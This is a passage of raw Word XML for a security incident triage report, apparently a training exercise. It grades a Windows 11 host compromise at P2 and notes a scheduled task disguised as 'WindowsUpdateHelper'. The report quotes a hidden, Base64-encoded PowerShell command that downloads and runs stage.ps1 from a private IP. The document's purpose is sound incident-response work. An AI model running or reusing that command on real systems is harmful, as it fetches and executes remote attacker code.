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1F7C" w14:textId="3024CD7D" w:rsidR="00D30D50" w:rsidRPr="00F426CE" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F426CE">
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">SECURITY INCIDENT </w:t>
      </w:r>
      <w:r w:rsidR="009E3FCD" w:rsidRPr="00F426CE">
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Report </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA1646F" w14:textId="2A376444" w:rsidR="00D30D50" w:rsidRPr="00F426CE" w:rsidRDefault="00000000" w:rsidP="00DA113F">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F426CE">
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Incident A — Triage, Escalation, Containment &amp; Evidence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3096AC33" w14:textId="77777777" w:rsidR="00D30D50" w:rsidRPr="00F426CE" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F426CE">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>1. Incident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30D50" w:rsidRPr="00F426CE" w14:paraId="7747BB1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F58EB02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13C7455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Details</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D30D50" w:rsidRPr="00F426CE" w14:paraId="4A9C1214" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5112" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="15E155DF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Incident / Ticket ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5112" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="00A810E0" w14:textId="5761263C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[INC-</w:t>
            </w:r>
            <w:r w:rsidR="00DA113F" w:rsidRPr="00F426CE">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>XXXX</w:t>
            </w:r>
            <w:r w:rsidRPr="00F426CE">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D30D50" w:rsidRPr="00F426CE" w14:paraId="2AE22892" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5112" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="606E65A7" w14:textId="77A4E500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 xml:space="preserve">Date/time detected </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5112" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="063E9B8D" w14:textId="32779BEA" w:rsidR="00D30D50" w:rsidRPr="00F426CE" w:rsidRDefault="00DA113F" w:rsidP="00DA113F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2026-10-27 11:04:02.249 </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D30D50" w:rsidRPr="00F426CE" w14:paraId="7F652346" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5112" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="413B334B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Reported by / source</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5112" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="172B9E50" w14:textId="4504A483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[SIEM]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D30D50" w:rsidRPr="00F426CE" w14:paraId="092DBEC5" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5112" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="660727D1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Analyst / team</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5112" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3B8F72A4" w14:textId="063E4768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</w:t>
            </w:r>
            <w:r w:rsidR="00DA113F" w:rsidRPr="00F426CE">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Mohammed Alnabelsi </w:t>
            </w:r>
            <w:r w:rsidRPr="00F426CE">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> / team</w:t>
            </w:r>
            <w:r w:rsidR="00DA113F" w:rsidRPr="00F426CE">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> 16 </w:t>
            </w:r>
            <w:r w:rsidRPr="00F426CE">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D30D50" w:rsidRPr="00F426CE" w14:paraId="287BF5FB" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5112" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3AFC4017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Affected host / asset ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5112" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7A3398DB" w14:textId="1D7338AA" w:rsidR="00D30D50" w:rsidRPr="00F426CE" w:rsidRDefault="00DA113F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</w:t>
            </w:r>
            <w:r w:rsidRPr="00F426CE">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>windows11-host</w:t>
            </w:r>
            <w:r w:rsidRPr="00F426CE">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D30D50" w:rsidRPr="00F426CE" w14:paraId="3F8678C5" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5112" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="369871BB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IP address / user / business owner</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5112" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="114FDAB8" w14:textId="6C0B50E6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</w:t>
            </w:r>
            <w:r w:rsidR="00DA113F" w:rsidRPr="00F426CE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="00DA113F" w:rsidRPr="00F426CE">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>A</w:t>
            </w:r>
            <w:r w:rsidR="00DA113F" w:rsidRPr="00F426CE">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>kufa</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00DA113F" w:rsidRPr="00F426CE">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00F426CE">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D30D50" w:rsidRPr="00F426CE" w14:paraId="392D866B" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5112" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="24D3F2B0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Incident status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5112" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="72120A99" w14:textId="72D9BD6B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[triage]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="228A9402" w14:textId="77777777" w:rsidR="00D30D50" w:rsidRPr="00F426CE" w:rsidRDefault="00D30D50">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="395CE219" w14:textId="77777777" w:rsidR="00D30D50" w:rsidRPr="00F426CE" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F426CE">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>2. Severity Assessment (P1–P4)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D50" w:rsidRPr="00F426CE" w14:paraId="1D31156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B5ABCF6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Severity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3100814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Typical interpretation (adapt to your policy)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912B185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Select / evidence-based reason</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D30D50" w:rsidRPr="00F426CE" w14:paraId="41CC3276" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3408" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7F0E10D0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P1 — Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3408" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="59A7EEF3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Active or likely major compromise; privileged/system-wide impact, critical service disruption, or rapid spread.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3408" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1A86D5FE" w14:textId="04EEA33C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 xml:space="preserve">[ ] P1 </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D30D50" w:rsidRPr="00F426CE" w14:paraId="2FC183FA" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3408" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="51B8B3C1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P2 — High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3408" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="35D4D99E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Credible compromise or high-risk malicious execution on a host; material data or service risk.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3408" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="41AD4875" w14:textId="73DAC5B1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</w:t>
            </w:r>
            <w:r w:rsidR="009E3FCD" w:rsidRPr="00F426CE">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Check</w:t>
            </w:r>
            <w:r w:rsidRPr="00F426CE">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">] P2 </w:t>
            </w:r>
            <w:r w:rsidR="009E3FCD" w:rsidRPr="00F426CE">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">/Reason :Code Execution +   Persistence </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D30D50" w:rsidRPr="00F426CE" w14:paraId="7F98262C" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3408" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2DF0CEA2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P3 — Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3408" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0A33FB44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Suspicious activity with limited confirmed impact; scope appears contained and no critical asset impact identified.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3408" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="073B0E16" w14:textId="7BF58D6E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 xml:space="preserve">[ ] P3 </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D30D50" w:rsidRPr="00F426CE" w14:paraId="5B8322D8" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3408" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0AFD716E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P4 — Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3408" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="37F53DC9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Low-confidence alert, benign explanation likely, or minimal impact after validation.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3408" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="56502408" w14:textId="25F32595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 xml:space="preserve">[ ] P4 </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="50DC8D70" w14:textId="77777777" w:rsidR="00D30D50" w:rsidRPr="00F426CE" w:rsidRDefault="00D30D50">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="382ADAC7" w14:textId="1300EF90" w:rsidR="00D30D50" w:rsidRPr="00F426CE" w:rsidRDefault="009E3FCD">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F426CE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Reason</w:t>
      </w:r>
      <w:r w:rsidRPr="00F426CE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> :</w:t>
      </w:r>
      <w:r w:rsidR="00000000" w:rsidRPr="00F426CE">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">consider P2 (High) pending validation, because it combines remote code retrieval/execution with a persistence mechanism. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F17DD02" w14:textId="77777777" w:rsidR="00D30D50" w:rsidRPr="00F426CE" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F426CE">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>3. Technical Summary &amp;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8748"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D30D50" w:rsidRPr="00F426CE" w14:paraId="53BC6F39" w14:textId="77777777" w:rsidTr="00F426CE">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2124" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9EAF7"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="318671F7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Item</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8748" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9EAF7"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0DCEDB36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Observed value / notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D30D50" w:rsidRPr="00F426CE" w14:paraId="23161753" w14:textId="77777777" w:rsidTr="00F426CE">
        <w:trPr>
          <w:trHeight w:val="890"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2124" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7F03B7EB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Observed command / source alert</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8748" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4CB3A6E2" w14:textId="6DD27A75" w:rsidR="00D30D50" w:rsidRPr="00F426CE" w:rsidRDefault="00F426CE" w:rsidP="00F426CE">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F426CE">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Task Arguments</w:t>
            </w:r>
            <w:r w:rsidRPr="00F426CE">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> = -</w:t>
            </w:r>
            <w:r w:rsidRPr="00F426CE">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Window Style</w:t>
            </w:r>
            <w:r w:rsidRPr="00F426CE">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> Hidden -enc aQBlAHgAIAAoAE4AZQB3AC0ATwBi</w:t>
            </w:r>
            <w:r w:rsidRPr="00F426CE">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00F426CE">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>AGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8</w:t>
            </w:r>
            <w:r w:rsidRPr="00F426CE">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00F426CE">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AM</w:t>
            </w:r>
            <w:r w:rsidRPr="00F426CE">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00F426CE">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>QA5ADIALgAxADYAOAAuADQAMwAuADEAMgA5AC8AcwB0AGEAZwBlAC4AcABzADEAJwApA</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D30D50" w:rsidRPr="00F426CE" w14:paraId="690B5059" w14:textId="77777777" w:rsidTr="00F426CE">
        <w:trPr>
          <w:trHeight w:val="350"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2124" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2189A239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Scheduled task</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8748" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="38211ABB" w14:textId="7F5101E1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 xml:space="preserve">WindowsUpdateHelper </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D30D50" w:rsidRPr="00F426CE" w14:paraId="2AD090C4" w14:textId="77777777" w:rsidTr="00F426CE">
        <w:trPr>
          <w:trHeight w:val="440"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2124" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="72164D0E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Remote resource</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8748" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5C971369" w14:textId="29695C12" w:rsidR="00D30D50" w:rsidRPr="00F426CE" w:rsidRDefault="009E3FCD">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId8" w:history="1">
              <w:proofErr w:type="spellStart"/>
              <w:r w:rsidRPr="00F426CE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:color w:val="000000" w:themeColor="text1"/>
                  <w:sz w:val="17"/>
                </w:rPr>
                <w:t>h</w:t>
              </w:r>
              <w:r w:rsidR="00F426CE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:color w:val="000000" w:themeColor="text1"/>
                  <w:sz w:val="17"/>
                </w:rPr>
                <w:t>xx</w:t>
              </w:r>
              <w:r w:rsidRPr="00F426CE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:color w:val="000000" w:themeColor="text1"/>
                  <w:sz w:val="17"/>
                </w:rPr>
                <w:t>p</w:t>
              </w:r>
              <w:proofErr w:type="spellEnd"/>
              <w:r w:rsidRPr="00F426CE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:color w:val="000000" w:themeColor="text1"/>
                  <w:sz w:val="17"/>
                </w:rPr>
                <w:t>:</w:t>
              </w:r>
              <w:r w:rsidR="00F426CE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:color w:val="000000" w:themeColor="text1"/>
                  <w:sz w:val="17"/>
                </w:rPr>
                <w:t>[]</w:t>
              </w:r>
              <w:r w:rsidRPr="00F426CE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:color w:val="000000" w:themeColor="text1"/>
                  <w:sz w:val="17"/>
                </w:rPr>
                <w:t>192.168.43</w:t>
              </w:r>
              <w:r w:rsidR="00F426CE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:color w:val="000000" w:themeColor="text1"/>
                  <w:sz w:val="17"/>
                </w:rPr>
                <w:t>[]</w:t>
              </w:r>
              <w:r w:rsidRPr="00F426CE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:color w:val="000000" w:themeColor="text1"/>
                  <w:sz w:val="17"/>
                </w:rPr>
                <w:t>129/stage.ps1</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D30D50" w:rsidRPr="00F426CE" w14:paraId="484B420D" w14:textId="77777777" w:rsidTr="00F426CE">
        <w:trPr>
          <w:trHeight w:val="602"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2124" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1E4E7F14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PowerShell behavior</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8748" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="446DEDDE" w14:textId="77777777" w:rsidR="00D30D50" w:rsidRPr="00F426CE" w:rsidRDefault="00000000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Hidden window; Base64-encoded command; DownloadString + Invoke-Expression</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="54499157" w14:textId="3440C805" w:rsidR="00D30D50" w:rsidRPr="00F426CE" w:rsidRDefault="00F426CE">
      <w:pPr>
        <w:spacing w:after="0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25599C0F" w14:textId="77777777" w:rsidR="00D30D50" w:rsidRPr="00F426CE" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F426CE">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>4. Escalation — Six-Field Call</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C4C30A" w14:textId="77777777" w:rsidR="00D30D50" w:rsidRPr="00F426CE" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F426CE">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Use the six fields below when calling the incident lead / SOC manager / incident commander. Be concise and separate confirmed facts from assumptions.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5682"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F426CE" w:rsidRPr="00F426CE" w14:paraId="2CC0E932" w14:textId="77777777" w:rsidTr="00F426CE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C7B3D70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Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5682" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9EAF7"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6EF0AD41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b/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>What to communicate</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F426CE" w:rsidRPr="00F426CE" w14:paraId="485CE8A3" w14:textId="77777777" w:rsidTr="00F426CE">
        <w:trPr>
          <w:trHeight w:val="54"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3408" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7FBEDB0F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1. Who</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5682" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="57E6BB9E" w14:textId="4050F261" w:rsidR="00F426CE" w:rsidRPr="00F426CE" w:rsidRDefault="00F426CE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7"/>
              </w:rPr>
              <w:t>M</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">ohammed Alnabelsi </w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t xml:space="preserve">Ahmad </w:t>
            </w:r>
